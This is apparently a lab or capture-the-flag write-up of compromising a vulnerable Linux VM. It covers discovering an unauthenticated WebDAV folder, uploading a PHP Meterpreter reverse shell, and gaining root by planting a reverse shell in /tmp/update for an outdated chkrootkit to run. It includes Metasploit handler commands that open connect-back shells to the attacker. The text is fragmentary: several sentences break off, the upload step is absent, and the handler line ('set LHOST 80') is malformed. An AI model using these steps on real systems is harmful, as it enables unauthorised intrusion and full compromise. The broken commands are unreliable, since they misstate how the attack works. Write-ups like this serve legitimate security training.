This machine had an unprotected folder which allowed uploading of malicious PHP code which could then be
executed remotely. An attacker could then create an unprivileged shell on the victim machine and begin to
explore the system for additional vulnerabilities which could lead to a full compromise. During the
exploration, an outdated version of
chkrootkit was found. By exploiting a known vulnerability in the way
chkrootkit parses arguments, an attacker could create a malicious file that would later be run by
chkrootkit as a fully privileged user.
- nmap - discovery
- uniscan - web application scanner
- metasploit - exploit framework
- msfvenom - payload generation
- local-linux-enum script - enumeration
Proof of Concept
In order to cut down on typing, once the IP of the victim computer is discovered, it can be added to the
echo "192.168.1.188 vm" >> /etc/hosts
We begin with scanning the victim’s machine and find ports 80 and 22.
❯❯ nmap -p - -A vm | tee nmap.scan
Navigating to the page and checking its source code reveals nothing
uniscan, a folder named
test is discovered
❯❯ uniscan -qweds -u http://vm/
The listing appeared to be empty but further examination of the
/test path revealed that it responded to
more than just HTTP methods.
MOVE seemed to indicate WebDAV.
❯❯ curl -vX OPTIONS vm/test
This path requires no authentication and thus allows attackers to upload files to the web server.
Verifying successful upload:
Having uploaded the reverse shell, the Meterpreter handler is constructed
set PAYLOAD php/meterpreter/reverse_tcp set LHOST 80 run -j
…and the payload is activated.
Once a shell has been established on the system, an enumeration script reveals what additional vulnerabilities might lead to a full compromise.
The installed version of
chkrootkit is outdated and vulnerable to a code execution exploit.
The ExploitDB gives the following description:
Using Metasploit, we create another handler and payload, using the
chkrootkit module. This module will
/tmp/update file with the reverse tcp shell of your choosing. The next time
chkrootkit is run, this update file will connect back to the attacker computer designated in the payload.